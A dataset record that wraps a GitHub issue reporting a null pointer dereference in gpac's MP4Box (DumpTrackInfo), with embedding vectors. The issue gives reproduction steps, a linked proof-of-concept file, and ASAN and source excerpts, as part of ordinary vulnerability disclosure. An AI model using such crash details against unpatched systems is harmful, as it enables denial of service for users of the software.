0.008421315811574459, -0.002814909676089883, -0.02008436992764473, -0.03040030226111412, -0.011122765019536018, -0.0013336151605471969, -0.013399185612797737, 0.02156836725771427, -0.008378093130886555, 0.026985671371221542, 0.004538433626294136, 0.003562310477718711, -0.009184925816953182, 0.016828224062919617, -0.002416896168142557, -0.002098125172778964, 0.006245749536901712, 0.002355663338676095, 0.004318716004490852, 0.006850874051451683, -0.013442409224808216, -0.02822473645210266, 0.006213332060724497, 0.0019378392025828362, 0.005374081898480654, 0.00027036998653784394, 0.0044663953594863415, 0.012585149146616459, -0.0008671650430187583, 0.0006208829581737518, 0.01737571880221367, -0.026150023564696312, -0.020228447392582893, 0.009537914767861366, 0.002645618747919798, 0.017130786553025246, 0.0010247495956718922, -0.010143039748072624, -0.0009464075556024909, -0.01203045155853033, -0.033973418176174164, 0.010092612355947495, 0.015430674888193607, 0.015603567473590374, -0.011980024166405201, -0.027850136160850525, -0.0011445137206465006, -0.0343768335878849, 0.012556334026157856, 0.006022429559379816, 0.001845989958383143, -0.030947797000408173, -0.010553659871220589, 0.013118235394358635, -0.014645453542470932, 0.013442409224808216, -0.015963761135935783, 0.03760416433215141, -0.0054353149607777596, -0.017246048897504807, -0.005957595072686672, 0.010474417358636856, 0.0030814525671303272, 0.01883089914917946, 0.012203344143927097, 0.006252953317016363, 0.012174529023468494, 0.01728927157819271, 0.00937222596257925, -0.014097960665822029, 0.002769885351881385, 0.00005943187352386303, -0.008493354544043541, -0.01499844342470169, 0.0018784073181450367, -0.004390754736959934, 0.007729745469987392, -0.008212404325604439, -0.0030814525671303272, 0.004621278494596481, -0.00423947349190712, -0.016986709088087082, 0.036163393408060074, -0.013665728271007538, -0.001779354177415371, -0.012664391659200191, 0.002114333910867572, -0.002346658380702138, -0.0052047912031412125, -0.000206885946681723, -0.024536358192563057, -0.005219198763370514, -0.0027968999929726124, 0.02665429376065731, -0.014602230861783028, -0.015747645869851112, -0.0036739702336490154, -0.006843670271337032, -0.030112149193882942, -0.009271372109651566, -0.023556632921099663, 0.019104644656181335, 0.017548611387610435, 0.004315114114433527, -0.007448794785887003, 0.0056946538388729095, -0.00604043947532773, 0.017563018947839737, -0.043770674616098404, -0.00906245969235897, -0.028570521622896194, -0.02613561600446701, 0.016727371141314507, 0.011497365310788155, 0.0076865218579769135, -0.010171854868531227, -0.017101971432566643, -0.007376756053417921, 0.021064097061753273, -0.013363166712224483, -0.0001475666358601302, 0.022346382960677147, -0.030054517090320587, -0.03060201182961464, 0.004624880384653807, -0.02321084775030613, -0.02478129044175148, -0.001294894376769662, -0.005773896351456642, -0.01914786919951439, 0.010157447308301926, 0.0006321389810182154, 0.011259638704359531, 0.003976532723754644, -0.0039513190276920795, -0.00878871325403452, -0.006879689637571573, 0.022548092529177666, -0.0029355743899941444, 0.00906245969235897, 0.015963761135935783, -0.010697737336158752, 0.012131305411458015, -0.022562500089406967, -0.0012480693403631449, 0.012945341877639294, 0.018297811970114708, -0.007272299844771624, -0.00001570217136759311, -0.01374497078359127, 0.011907986365258694, -0.008075530640780926, 0.012577945366501808, 0.016785001382231712, 0.013780990615487099, -0.011065133847296238, 0.01234021782875061, -0.005139956250786781, 0.006440253928303719, -0.003036428475752473, -0.010027777403593063, 0.020487787202000618, -0.015315413475036621, -0.001474990975111723, -0.012938138097524643, -0.006343001499772072, -0.015603567473590374, 0.0068292622454464436, 0.029823994264006615, -0.013572078198194504, -0.011101153679192066, -0.018038474023342133, 0.008990420959889889, -0.015848498791456223, -0.025890683755278587, -0.007751356810331345, 0.0187444519251585, 0.03622102364897728, -0.003706387709826231, 0.0012030451325699687, -0.022015005350112915, 0.0028851472306996584, 0.008471743203699589, 0.003506480483338237, 0.012469887733459473, -0.012808469124138355, 0.0063502052798867226, 0.00873828586190939, -0.0014984036097303033, -0.0031624960247427225, 0.025227928534150124, 0.009076867252588272, 0.024075310677289963, 0.0041170078329741955, 0.015387452207505703, 0.011814335361123085, 0.004091794136911631, -0.029074791818857193, -0.00411340594291687, -0.024723658338189125, -0.008630228228867054, 0.006029633339494467, -0.01707315631210804, -0.005968400742858648, 0.001737931976094842, -0.011295657604932785, 0.0017505388241261244, -0.0005200288724154234, 0.0406009741127491, 0.013802601955831051, -0.008104345761239529, 0.009609953500330448, 0.013716155663132668, 0.010315932333469391, -0.00452762795612216, 0.009329003281891346, 0.003025622572749853, -0.0054641300812363625, 0.01737571880221367, 0.00014272653788793832, -0.016323953866958618, -0.011029114946722984, -0.008925586938858032, 0.00645466148853302, -0.012419460341334343, 0.0077873761765658855, -0.0005546974716708064, 0.009220944717526436, 0.02197178266942501, 0.013521651737391949, -0.016093431040644646, -0.015488306060433388, -0.02538641355931759, -0.000863563094753772, 0.005853138864040375, 0.006602340843528509, 0.0049382480792701244, -0.02312440052628517, 0.01592053845524788, -0.005136354360729456, -0.006249351426959038, 0.0009491089731454849, -0.017937619239091873, -0.018268996849656105, 0.016194283962249756, 0.006847272161394358, -0.013500039465725422, 0.021914152428507805, 0.00525882001966238, 0.012866099365055561, 0.020055554807186127, 0.022504867985844612, -0.011994432657957077, 0.0011643243487924337, -0.022245530039072037, 0.006306982133537531, 0.013622505590319633, 0.0003478115249890834, 0.00026969463215209544, 0.014746308326721191, 0.016179876402020454, -0.00999175850301981, -0.0026636284310370684, 0.007808987982571125, -0.002964389743283391, 0.00020531010522972792, -0.0016118644271045923, 0.010849017649888992, -0.006904902867972851, 0.007981880567967892, 0.020891202613711357, -0.0015479300636798143, -0.000517777691129595, 0.0004903129301965237, 0.020963242277503014, 0.0010841813636943698, -0.024738065898418427, -0.007888230495154858, -0.008421315811574459, -0.014645453542470932, -0.0013714354718104005, -0.0025231530889868736, -0.014169999398291111, 0.0032345345243811607, 0.007542444858700037, -0.010978687554597855, 0.019191091880202293, -0.015156928449869156, 0.011165987700223923, 0.008911178447306156, 0.0038288533687591553, -0.0031462872866541147, -0.010532048530876637, -0.01462384220212698, -0.002768084406852722, 0.017332494258880615, -0.003789232112467289, 0.009977350942790508, -0.013370370492339134, -0.0028077056631445885, -0.0034416457638144493, 0.02976636216044426, -0.008565393276512623, 0.014688677154481411, 0.023282885551452637, -0.0035352958366274834, -0.018585966899991035, -0.021942967548966408, -0.001943242154084146, 0.01087783370167017, 0.010985891334712505, 0.018052881583571434, -0.003475863952189684, -0.012880507856607437, 0.007470406126230955, 0.002903156913816929, -0.0010706741595640779, 0.015315413475036621, 0.000282976747257635, 0.004433977883309126, -0.01854274421930313, -0.0037820280995219946, -0.0038684746250510216, -0.025544898584485054, -0.0011310065165162086, -0.009775642305612564, 0.03322421759366989, -0.008774305693805218, 0.012815672904253006, -0.010171854868531227, -0.0022205908317118883, 0.0014659861335530877, -0.009725215844810009, -0.005118344910442829, 0.014839958399534225, 0.014501377008855343, -0.003248942317441106, -0.00484459800645709, -0.017044341191649437, -0.0003930607927031815, 0.012635576538741589, 0.005874750670045614, -0.0020044748671352863, 0.011843151412904263, -0.0003793284122366458, 0.011043522506952286, 0.029535839334130287, -0.010034981183707714, 0.03080371953547001, 0.01612224616110325, -0.007463202346116304, -0.020891202613711357, -0.02821032889187336, -0.005017490591853857, 0.01896056719124317, -0.02665429376065731, -0.010805794969201088, -0.009141702204942703, -0.0182257741689682, 0.0026726331561803818, -0.015041666105389595, -0.013989902101457119, 0.0011093949433416128, 0.01583409123122692, -0.0038468630518764257, -0.020905612036585808, -0.005402897484600544, 0.011461346410214901, 0.01581968367099762, -0.008334869518876076, -0.03832455351948738, -0.007358746137470007, 0.01498403586447239, 0.010964279994368553, 0.014184406958520412, -0.026380546391010284, 0.020430156961083412, 0.011699073947966099, 0.007243484724313021, 0.006220535840839148, -0.010020573623478413, -0.0395347997546196, 0.008183588273823261, 0.02424820326268673, 0.0006433950620703399, 0.0066527677699923515, 0.0010175456991419196, 0.01150457002222538, 0.012866099365055561, 0.022000597789883614, -0.003020219737663865, 0.023758340626955032, -0.023916825652122498, -0.0074271829798817635, 0.017980841919779778, 0.008493354544043541, -0.0010634702630341053, -0.02155395969748497, -0.015978168696165085, -0.010063797235488892, -0.006883291527628899, 0.024118533357977867, 0.0016848035156726837, 0.007275901734828949, 0.0008779708296060562, -0.020127594470977783, -0.017433349043130875, 0.015012850984930992, -0.0029319722671061754, -0.014897589571774006, 0.001270581386052072, -0.011605423875153065, 0.0018892131047323346, 0.004509618505835533, -0.000040127768443198875, -0.012369032949209213, -0.01093546487390995, 0.02384478785097599, -0.009199333377182484, 0.005363276228308678, 0.004884219262748957, 0.028167106211185455, 0.014292464591562748, 0.007492017932236195, -0.021582774817943573, 0.02280743047595024, 0.005950390826910734, -0.016684146597981453, -0.0008950799820013344, 0.0001889888517325744, 0.01556034479290247, -0.020444564521312714, 0.019969109445810318, 0.006894097197800875, -0.005972002632915974, -0.0050751217640936375, 0.017750319093465805, 0.0005569486529566348, 0.0021737657953053713, -0.0013453214196488261, -0.014911997132003307, 0.00828444305807352, 0.021597182378172874, 0.0008910278556868434, 0.00692651467397809, 0.020228447392582893, -0.012462683022022247, 0.002991404151543975, 0.0010679727420210838, 0.008262830786406994, 0.02519911341369152, -0.017029933631420135, -0.0016559880459681153, 0.0007843206403777003, 0.0015281194355338812, -0.010719348676502705, 0.015128112398087978, 0.019450431689620018, -0.0077873761765658855, -0.004185444675385952, 0.0038288533687591553, 0.00847894698381424, 0.0033263838849961758, 0.013773786835372448, -0.010229486040771008, 0.0030958601273596287, -0.0014975030208006501, -0.010402378626167774, 0.006937320344150066, 0.0033263838849961758, 0.016885856166481972, 0.0035551064647734165, 0.011936801485717297, -0.0013570277951657772, -0.011735092848539352, -0.009134498424828053, -0.023787155747413635, -0.02166922017931938, 0.026726333424448967, -0.023369332775473595, 0.019191091880202293, 0.015545937232673168, 0.005410101264715195, -0.006991349160671234, -0.005849536973983049, 0.015185743570327759, 0.0029607878532260656, -0.0030040109995752573, -0.01968095451593399, 0.0012489698128774762, -0.00663836020976305, -0.00013372171088121831, 0.002881545340642333, 0.013867436908185482, 0.0039405133575201035, 0.003753212746232748, 0.008370889350771904, -0.0077873761765658855, 0.0039513190276920795, 0.01802406646311283, 0.022850655019283295, 0.018989384174346924, 0.004109804052859545, -0.0020747126545757055, 0.022404015064239502, -0.010337543673813343, -0.0011048925807699561, -0.004469997249543667, 0.02822473645210266, -0.009869292378425598, -0.010985891334712505, -0.01842748187482357, 0.012556334026157856, -0.0093650221824646, -0.007218271028250456, -0.005139956250786781, -0.011677462607622147, -0.00060197280254215, 0.01635276898741722, 0.0028689384926110506, -0.006004420109093189, 0.0008572597289457917, -0.014926404692232609, 0.00942985713481903, 0.02622206136584282, 0.015171336010098457, 0.025732198730111122, -0.009840477257966995, 0.002901355968788266, 0.005197587423026562, 0.02092001959681511, 0.02031489461660385, -0.005431713070720434, -0.001600158168002963, 0.007888230495154858, -0.012772449292242527, -0.005150762386620045, 0.004614074248820543, 0.00045384338591247797, 0.006933718454092741, -0.004873413592576981, 0.017721503973007202, 0.00382525147870183, -0.009026440791785717, 0.019709769636392593, 0.022504867985844612, -0.02050219476222992, -0.011425327509641647, 0.006861679721623659, -0.013889048248529434, 0.033886972814798355, 0.013471224345266819, 0.0016199687961488962, 0.005269626155495644, -0.007535241078585386, -0.005172373726963997, -0.008414112031459808, 0.005049908068031073, 0.005244412459433079, 0.007124620955437422, 0.013730563223361969, 0.04645051062107086, 0.004192648455500603, 0.00559740187600255, -0.001447075977921486, 0.000038383084756787866, -0.010215078480541706, -0.0009644171805121005, -0.02309558540582657, -0.010488824918866158, -0.0068184565752744675, -0.0015272189630195498, 0.007160639856010675, 0.029074791818857193, -0.01316145807504654, 0.00034308398608118296, 0.01108674518764019, 0.002449313411489129, -0.0028221134562045336, 0.009444264695048332, -0.005687450058758259, -0.0063502052798867226, 0.0062925745733082294, 0.012750837951898575, -0.006631155963987112, -0.00999896228313446, 0.03965006396174431, 0.012412256561219692, -0.004614074248820543, 0.031178319826722145, 0.014357299543917179, -0.014011514373123646, 0.022043822333216667, 0.013600894249975681, -0.005399295594543219, -0.0049022287130355835, 0.01571882888674736, 0.01056086365133524, 0.014126775786280632, 0.00663836020976305, -0.02083357237279415, -0.02540082111954689, 0.014522988349199295, 0.011893577873706818, -0.005276829935610294, 0.00307244760915637, 0.0033065732568502426, -0.005770294461399317, 0.01602139137685299, -0.007250688504427671, 0.01664092391729355, 0.00367036834359169, -0.008032307960093021, -0.012239363975822926, -0.0047725592739880085, -0.004178240895271301, 0.0270721185952425, -0.009379429742693901, 0.0013300132704898715, -0.013600894249975681, -0.024017680436372757, 0.0077873761765658855, -0.010078204795718193, 0.018902936950325966, 0.0036181402392685413, 0.003639751812443137, 0.018470704555511475, -0.006814854685217142, -0.003443446708843112, 0.007153436075896025, 0.0050859274342656136, -0.0017883590189740062, 0.017865581437945366, 0.016986709088087082, -0.009134498424828053, 0.008947198279201984, 0.013449613004922867, -0.017548611387610435, -0.009184925816953182, 0.01842748187482357, 0.008385296911001205, -0.004459191579371691, 0.0009500094456598163, 0.004545637872070074, 0.0005002182442694902, -0.006051245145499706, 0.00786661822348833, 0.009329003281891346, -0.01936398446559906, -0.014537395909428596, -0.006951727904379368, -0.03780587390065193, -0.004253881052136421, 0.02184211276471615, -0.02299473062157631, 0.018686821684241295, -0.013730563223361969, -0.0029625887982547283, 0.0003138182801194489, 0.005175975617021322, 0.010676125064492226, -0.0012075476115569472, -0.009912515990436077, 0.008270034566521645, -0.022821838036179543, -0.0027032496873289347, 0.010099816136062145, 0.011619831435382366, -0.003232733579352498, 0.0006866182084195316, -0.002753676613792777, 0.016813816502690315, -0.005917973816394806, -0.003677572123706341, 0.013831417076289654, 0.004243075381964445, 0.0343480184674263, 0.005420906934887171, -0.006202526390552521, 0.0021881733555346727, -0.008053919300436974, -0.011122765019536018, -0.01593494601547718, 0.0027662834618240595, 0.010409582406282425, 0.003664965508505702, -0.008644635789096355, -0.025444045662879944, -0.009847681038081646, -0.003962124697864056, -0.010647309944033623, 0.026884818449616432, 0.009278575889766216, 0.0003836057148873806, 0.0012642779620364308, 0.031812261790037155, -0.0026114003267139196, 0.010697737336158752, 0.022404015064239502, 0.01030872855335474, 0.005021092481911182, -0.002051300136372447, -0.01108674518764019, -0.007034572307020426, -0.015762053430080414, 0.012606760486960411, 0.010546456091105938, -0.0192487221211195, -0.026394955813884735, -0.020891202613711357, 0.0096315648406744, 0.015430674888193607, -0.0010733755771070719, -0.008262830786406994, 0.019032606855034828, -0.012448275461792946, 0.013953883200883865, 0.014040329493582249, 0.011331676505506039, -0.0012129504466429353, -0.02135225012898445, -0.00878871325403452, 0.013355962932109833, 0.006105273962020874, 0.028354406356811523, -0.026279693469405174, 0.0002505593583919108, -0.031380027532577515, 0.005496547557413578, 0.023801563307642937, 0.006008021999150515, -0.011814335361123085, -0.01051764003932476, -0.017735911533236504, -0.007506425492465496, -0.002022484550252557, 0.012743634171783924, -0.0038288533687591553, 0.011173191480338573, -0.00025033424026332796, -0.007419979199767113, 0.002555570565164089, 0.0038072417955845594, 0.008450131863355637, 0.02364307828247547, -0.011101153679192066, 0.0030022100545465946, 0.016943486407399178, 0.003468660172075033, -0.011799927800893784, 0.04405882582068443, 0.01603579893708229, 0.019421614706516266, 0.013370370492339134, 0.004178240895271301, 0.027417903766036034, -0.0075280372984707355, -0.024204980581998825, -0.006206128280609846, 0.011410919018089771, 0.019911477342247963, 0.010892241261899471, 0.0088463444262743, 0.0009779244428500533, 0.0002577632258180529, 0.009653177112340927, -0.0011535185622051358, 0.007250688504427671, -0.015041666105389595, -0.010402378626167774, 0.0038324552588164806, 0.005291237495839596, 0.02080475725233555, -0.014811143279075623, -0.007492017932236195, -0.018816491588950157, 0.015315413475036621, 0.00196485361084342, -0.007193057332187891, 0.0035334948915988207, 0.01494081225246191, -0.003164296969771385, -0.004574452992528677, -0.003247141372412443, 0.008082734420895576, -0.003655960550531745, 0.016597701236605644, 0.01348563190549612, -0.0003252994501963258, -0.01623750850558281, 0.011043522506952286, -0.0009878297569230199, 0.01233301404863596, 0.010366358794271946, -0.0001252796791959554, 0.0020116788800805807, 0.0028023028280586004, 0.014033125713467598, 0.008032307960093021, 0.012059266678988934, 0.005626216996461153, 0.007700929883867502, -0.010546456091105938, 0.012794061563909054, 0.015747645869851112, 0.014335688203573227, -0.010366358794271946, 0.003108466975390911, 0.001494801603257656, -0.01108674518764019, 0.001984664238989353, 0.0018477909034118056, -0.023081177845597267, -0.021280212327837944, -0.023988865315914154, 0.00030571394017897546, 0.007585668005049229, 0.015387452207505703, -0.03112068958580494, 0.021625997498631477, -0.004390754736959934, -0.008572597056627274, -0.006631155963987112, -0.01176390890032053, -0.017822356894612312, -0.014004310593008995, 0.018989384174346924, -0.008601413108408451, 0.012887711636722088, 0.006969737820327282, 0.0055649843998253345, -0.003335388610139489, 0.02456517331302166, -0.005067917983978987, 0.002036892343312502, -0.014025921933352947, -0.01468147337436676, -0.009278575889766216, -0.008313258178532124, 0.015084889717400074, 0.025847461074590683, 0.012772449292242527, -0.005863944534212351, -0.023383740335702896, 0.026049168780446053, -0.001887412159703672, -0.0036325480323284864, 0.007355144247412682, -0.0012543726479634643, 0.013103826902806759, 0.01697230152785778, 0.020127594470977783, -0.021424289792776108, 0.00014812943118158728, 0.009710807353258133, 0.00917051825672388, -0.0017118180403485894, -0.010359155014157295, -0.016323953866958618, 0.0187444519251585, 0.012693206779658794, -0.004030561540275812, -0.020747127011418343, 0.0070849996991455555, 0.01593494601547718, -0.007337134797126055, 0.012095286510884762, -0.010323136113584042, 0.020487787202000618, 0.007816191762685776, -0.006623952183872461, 0.002076513599604368, 0.029420576989650726, 0.009148905985057354, 0.009782846085727215, -0.007463202346116304, -0.01004938967525959, 0.02593390829861164, 0.0018171744886785746, 0.026150023564696312, -0.0000760345283197239, -0.009329003281891346, 0.032417383044958115, -0.004171036649495363, 0.015445082448422909, 0.019234314560890198, -0.00937222596257925, 0.0058603426441550255, 0.004714928567409515, 0.02322525531053543, 0.022778615355491638, 0.04132135957479477, 0.008875159546732903, 0.01740453392267227, -0.0037820280995219946, 0.00021431493223644793, 0.004214259795844555, 0.011518977582454681, -0.0010994896292686462, 0.0026996477972716093, 0.011490161530673504, 0.019752992317080498, 0.01842748187482357, -0.00556858628988266, -0.010921056382358074, 0.00718585355207324, 0.02081916481256485, 0.01999792456626892, -0.0034488495439291, 0.007700929883867502, 0.008306054398417473, 0.009905312210321426, 0.009213740937411785, 0.017548611387610435, -0.0018513929098844528, -0.007578464224934578, 0.018283404409885406, -0.01760624162852764, 0.02038693241775036, -0.022865062579512596, -0.01165585033595562, -0.006317788269370794, -0.0008725679363124073, -0.009660380892455578, 0.006098070181906223, -0.011324472725391388, 0.010841813869774342, -0.01842748187482357, 0.021395474672317505, 0.013247904367744923, 0.00395852280780673, 0.010582474991679192, -0.02156836725771427, 0.01441493071615696, 0.035010773688554764, -0.012354625388979912, -0.0023160420823842287, -0.0059900120832026005, -0.0030436322558671236, -0.026207653805613518, -0.01561797596514225, -0.004415967967361212, 0.009278575889766216, -0.0062565552070736885, -0.01570442132651806, 0.02996807172894478, 0.01623750850558281, 0.0017280266620218754, 0.03071727231144905, -0.014040329493582249, -0.004542035982012749, -0.032013967633247375, -0.01603579893708229, 0.0043295216746628284 ]
21
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Hello, There is a Null Pointer Dereference in function DumpTrackInfo of filedump.c:2962,this can reproduce on the lattest commit. System info: Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0 [poc (2).zip](https://github.com/gpac/gpac/files/6771032/poc.2.zip) Verification steps: 1.Get the source code of gpac 2.Compile ``` cd gpac-master CC=gcc CXX=g++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" ./configure make ``` 3.run MP4Box ``` ./MP4Box -info poc.mp4 ``` command line ``` ... # Track 1 Info - ID 1 - TimeScale 44100 Media Duration 00:00:00.339 Media Info: Language "Undetermined (und)" - Type "soun:mp4a" - 13 samples Segmentation fault ``` GDB info ![null](https://user-images.githubusercontent.com/83855894/124626392-3550d680-deb1-11eb-9bf3-41d0744d5e3b.png) ASAN info ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==4002438==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55d13e590cfb bp 0x60b0000003b0 sp 0x7ffdd8b0e760 T0) ==4002438==The signal is caused by a READ memory access. ==4002438==Hint: address points to the zero page. #0 0x55d13e590cfa in DumpTrackInfo /home/.../gpac/gpac-master/applications/mp4box/filedump.c:2962 #1 0x55d13e59ff44 in DumpMovieInfo /home/.../gpac/gpac-master/applications/mp4box/filedump.c:3777 #2 0x55d13e55c71d in mp4boxMain /home/.../gpac/gpac-master/applications/mp4box/main.c:5991 #3 0x7f0ca4b400b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #4 0x55d13e4fef1d in _start (/home/.../gpac/gpac-master/bin/gcc/MP4Box+0x48f1d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/.../gpac/gpac-master/applications/mp4box/filedump.c:2962 in DumpTrackInfo ==4002438==ABORTING ``` source code ``` 2960 GF_ISOSample *samp = gf_isom_get_sample(file, trackNum, 1, &oti); 2961 if (samp) { 2962 u32 mhdr = GF_4CC((u8)samp->data[0], (u8)samp->data[1], (u8)samp->data[2], (u8)samp->data[3]); 2963 if (full_dump) fprintf(stderr, "\t"); 2964 fprintf(stderr, "%s Audio - %d Channel(s) - SampleRate %d - Layer %d\n", 2965 gf_mp3_version_name(mhdr), 2966 gf_mp3_num_channels(mhdr), 2967 gf_mp3_sampling_rate(mhdr), 2968 gf_mp3_layer(mhdr) 2969 ); ```
A Null Pointer Dereference In DumpTrackInfo
https://api.github.com/repos/gpac/gpac/issues/1844/comments
1
2021-07-06T15:29:45
2023-03-17T09:02:36Z
https://github.com/gpac/gpac/issues/1844
938,018,835
1,844
false
This is a GitHub Issue repo:gpac owner:gpac Title : A Null Pointer Dereference In DumpTrackInfo Issue date: --- start body --- Hello, There is a Null Pointer Dereference in function DumpTrackInfo of filedump.c:2962,this can reproduce on the lattest commit. System info: Ubuntu 20.04.1 : clang 10.0.0 , gcc 9.3.0 [poc (2).zip](https://github.com/gpac/gpac/files/6771032/poc.2.zip) Verification steps: 1.Get the source code of gpac 2.Compile ``` cd gpac-master CC=gcc CXX=g++ CFLAGS="-fsanitize=address" CXXFLAGS="-fsanitize=address" ./configure make ``` 3.run MP4Box ``` ./MP4Box -info poc.mp4 ``` command line ``` ... # Track 1 Info - ID 1 - TimeScale 44100 Media Duration 00:00:00.339 Media Info: Language "Undetermined (und)" - Type "soun:mp4a" - 13 samples Segmentation fault ``` GDB info ![null](https://user-images.githubusercontent.com/83855894/124626392-3550d680-deb1-11eb-9bf3-41d0744d5e3b.png) ASAN info ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==4002438==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55d13e590cfb bp 0x60b0000003b0 sp 0x7ffdd8b0e760 T0) ==4002438==The signal is caused by a READ memory access. ==4002438==Hint: address points to the zero page. #0 0x55d13e590cfa in DumpTrackInfo /home/.../gpac/gpac-master/applications/mp4box/filedump.c:2962 #1 0x55d13e59ff44 in DumpMovieInfo /home/.../gpac/gpac-master/applications/mp4box/filedump.c:3777 #2 0x55d13e55c71d in mp4boxMain /home/.../gpac/gpac-master/applications/mp4box/main.c:5991 #3 0x7f0ca4b400b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #4 0x55d13e4fef1d in _start (/home/.../gpac/gpac-master/bin/gcc/MP4Box+0x48f1d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/.../gpac/gpac-master/applications/mp4box/filedump.c:2962 in DumpTrackInfo ==4002438==ABORTING ``` source code ``` 2960 GF_ISOSample *samp = gf_isom_get_sample(file, trackNum, 1, &oti); 2961 if (samp) { 2962 u32 mhdr = GF_4CC((u8)samp->data[0], (u8)samp->data[1], (u8)samp->data[2], (u8)samp->data[3]); 2963 if (full_dump) fprintf(stderr, "\t"); 2964 fprintf(stderr, "%s Audio - %d Channel(s) - SampleRate %d - Layer %d\n", 2965 gf_mp3_version_name(mhdr), 2966 gf_mp3_num_channels(mhdr), 2967 gf_mp3_sampling_rate(mhdr), 2968 gf_mp3_layer(mhdr) 2969 ); ``` --- end body ---
2,551
[ -0.01380088273435831, 0.019286947324872017, -0.007607629522681236, -0.0005036036600358784, -0.0013866957742720842, 0.006221826653927565, -0.037030939012765884, 0.04048830270767212, 0.005078896414488554, 0.027944644913077354, -0.02914472110569477, 0.01807258464396, 0.029601892456412315, 0.02498731203377247, -0.006854009814560413, 0.01590101607143879, -0.008721986785531044, 0.022701451554894447, -0.017329679802060127, 0.029316160827875137, 0.06583277881145477, -0.0126650957390666, -0.01311512477695942, 0.04928886517882347, -0.002228714060038328, 0.01399375218898058, -0.02304433099925518, 0.01332228071987629, -0.0019876270089298487, 0.002564449794590473, 0.012779388576745987, 0.017715418711304665, -0.014686653390526772, 0.006393265910446644, 0.05617501959204674, -0.0011866830755025148, 0.04223127290606499, 0.0651470199227333, 0.009143441915512085, 0.014365204609930515, -0.008064801804721355, -0.05560355633497238, -0.01568671688437462, 0.014743800275027752, -0.01634390279650688, 0.025801649317145348, 0.02934473380446434, 0.014800946228206158, -0.014743800275027752, -0.0007049557752907276, 0.020815616473555565, -0.013865172863006592, -0.005814657546579838, -0.04557434469461441, 0.028058936819434166, -0.034030746668577194, 0.03077339567244053, 0.008886282332241535, -0.01172932144254446, 0.022144272923469543, -0.022144272923469543, 0.02045845054090023, -0.006264686118811369, 0.010929270647466183, -0.01292225532233715, -0.0012947256909683347, -0.00011674853885779157, 0.03803100436925888, 0.0010839978931471705, 0.03674520552158356, -0.029487600550055504, -0.03728809952735901, -0.01012207567691803, 0.02293003723025322, 0.02664456143975258, -0.05857517570257187, 0.0351165309548378, 0.03685950115323067, -0.011179286055266857, 0.022544298321008682, -0.0557749941945076, 0.002885898808017373, -0.040031131356954575, 0.0185869038105011, 0.018829775974154472, 0.011643601581454277, -0.0402882918715477, -0.0733761191368103, -0.03463078662753105, -0.01306512113660574, 0.005025321152061224, 0.007139742374420166, 0.004360993392765522, 0.017401112243533134, 0.012465083040297031, -0.0050003197975456715, -0.017486833035945892, -0.007664775941520929, -0.040545448660850525, -0.01797257736325264, -0.03843102976679802, -0.03997398540377617, 0.01260794885456562, 0.001617067726328969, 0.011215003207325935, -0.01280796155333519, 0.010579247958958149, -0.018672622740268707, 0.025444485247135162, 0.13795167207717896, 0.009057722054421902, -0.024415846914052963, -0.010007782839238644, -0.03225920721888542, 0.01775827817618847, 0.03668805956840515, -0.028701836243271828, -0.04120263457298279, -0.029101861640810966, -0.02725888602435589, -0.027216026559472084, -0.02458728663623333, -0.039202507585287094, 0.028387529775500298, -0.029687613248825073, 0.05486065149307251, -0.010664967820048332, -0.014336630702018738, -0.033316414803266525, -0.005796799436211586, -0.02398724853992462, -0.021515661850571632, 0.00673971651121974, -0.028430389240384102, -0.021115636453032494, 0.0006558455061167479, -0.03737381845712662, 0.0392596535384655, 0.008664839901030064, 0.00038797123124822974, -0.06754717975854874, -0.02738746628165245, 0.03771669790148735, -0.011679318733513355, -0.0067361448891460896, -0.0075933425687253475, 0.0009848844492807984, 0.0070147342048585415, -0.024758726358413696, -0.016286754980683327, -0.015972450375556946, -0.01126500591635704, 0.021158495917916298, 0.016201036050915718, 0.03231635317206383, -0.002557306317612529, 0.006078960373997688, 0.02551591768860817, -0.03997398540377617, -0.03448791801929474, 0.018058298155665398, -0.016201036050915718, 0.01838688924908638, -0.014393777586519718, -0.01962982676923275, -0.021615667268633842, 0.01901550218462944, 0.0217013880610466, -0.004925314802676439, 0.024201547726988792, -0.01167217455804348, -0.0010750687215477228, 0.01038637850433588, 0.0031466297805309296, -0.050374649465084076, 0.001192933414131403, -0.0019554821774363518, 0.048003070056438446, -0.012407936155796051, 0.005678934510797262, -0.008136234246194363, 0.016801074147224426, -0.002885898808017373, -0.011900761164724827, 0.012343646958470345, -0.010050642304122448, 0.03934537246823311, -0.01641533523797989, 0.013093694113194942, -0.0038645328022539616, -0.00020235669217072427, -0.010879267007112503, -0.0013509792042896152, 0.009779197163879871, 0.05754653736948967, 0.006943301297724247, -0.031459156423807144, -0.013900889083743095, -0.009393458254635334, -0.004425283055752516, -0.005743224639445543, -0.007414760068058968, -0.001901907380670309, 0.014100901782512665, -0.05106040835380554, -0.0037216665223240852, -0.02674456685781479, 0.039831120520830154, 0.00997920986264944, -0.027358893305063248, -0.020815616473555565, -0.02997334487736225, -0.0042824167758226395, -0.011757894419133663, -0.023387210443615913, 0.02243000641465187, 0.01312941126525402, 0.012465083040297031, 0.005411060526967049, -0.009207732044160366, 0.03225920721888542, -0.0021947831846773624, 0.03420218825340271, -0.01063639484345913, -0.04660297930240631, -0.025558777153491974, 0.012929398566484451, -0.002932330360636115, -0.033116403967142105, 0.005614644847810268, 0.034573640674352646, 0.014136618003249168, -0.0017474332125857472, -0.0067825764417648315, 0.023401496931910515, -0.014886666089296341, -0.0035073671024292707, -0.00452171778306365, 0.013050834648311138, 0.013936605304479599, 0.009907776489853859, 0.029830479994416237, -0.01798686385154724, -0.013915175572037697, 0.010700684040784836, 0.0454600490629673, -0.02294432371854782, -0.03017335757613182, 0.004200268536806107, 0.013772309757769108, 0.005936094094067812, -0.017129667103290558, -0.019872698932886124, -0.02005842514336109, -0.01178646832704544, -0.011850757524371147, 0.01797257736325264, -0.014543787576258183, 0.004035972524434328, -0.032916389405727386, 0.009143441915512085, -0.039831120520830154, -0.020301299169659615, -0.021229928359389305, 